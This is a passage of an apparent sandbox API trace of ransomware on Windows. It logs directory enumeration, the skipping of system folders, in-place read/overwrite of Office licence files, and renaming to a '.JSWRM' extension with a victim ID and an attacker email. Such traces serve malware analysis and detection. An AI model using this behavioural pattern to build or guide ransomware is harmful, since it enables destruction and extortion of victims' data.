lpOverlapped=0x0) returned 1 [0111.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.649] CloseHandle (hObject=0x45c) returned 1 [0111.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0111.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0111.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0111.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0111.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0111.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.650] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0111.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0111.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0111.651] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec09c0ea, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec09c0ea, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec15aca4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2993, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail2-pl.xrm-ms", cAlternateFileName="VIFB2C~1.XRM")) returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2=".") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="..") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="...") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="windows") returned -1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="recovery") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.651] lstrcmpiW (lpString1="VisioProR_Retail2-pl.xrm-ms", lpString2="msocache") returned 1 [0111.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0111.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0111.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0111.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2411f0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0111.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0111.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0111.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0111.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0111.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241380, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0111.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0111.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0111.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0111.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0111.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.652] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10643) returned 1 [0111.652] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0111.652] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0111.655] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.655] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0111.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.655] CloseHandle (hObject=0x45c) returned 1 [0111.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0111.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0111.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0111.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0111.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.655] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0111.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0111.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0111.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0111.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0111.656] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec075e91, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec075e91, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec134a58, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5177, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail2-ppd.xrm-ms", cAlternateFileName="VI7C60~1.XRM")) returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2=".") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="..") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="...") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="windows") returned -1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.657] lstrcmpiW (lpString1="VisioProR_Retail2-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0111.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2412e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0111.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0111.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0111.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.658] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20855) returned 1 [0111.658] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0111.658] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0111.670] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.671] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0111.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.671] CloseHandle (hObject=0x45c) returned 1 [0111.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0111.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0111.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0111.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0111.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0111.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0111.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.671] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0111.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0111.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0111.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0111.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.672] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec4ee541, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec645a80, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d46, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail2-ul-oob.xrm-ms", cAlternateFileName="VI5C8E~1.XRM")) returned 1 [0111.672] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.672] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.672] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.672] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.672] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.672] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.673] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.673] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.673] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.673] lstrcmpiW (lpString1="VisioProR_Retail2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0111.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0111.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0111.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail2-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0111.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0111.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.674] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11590) returned 1 [0111.674] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0111.674] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, 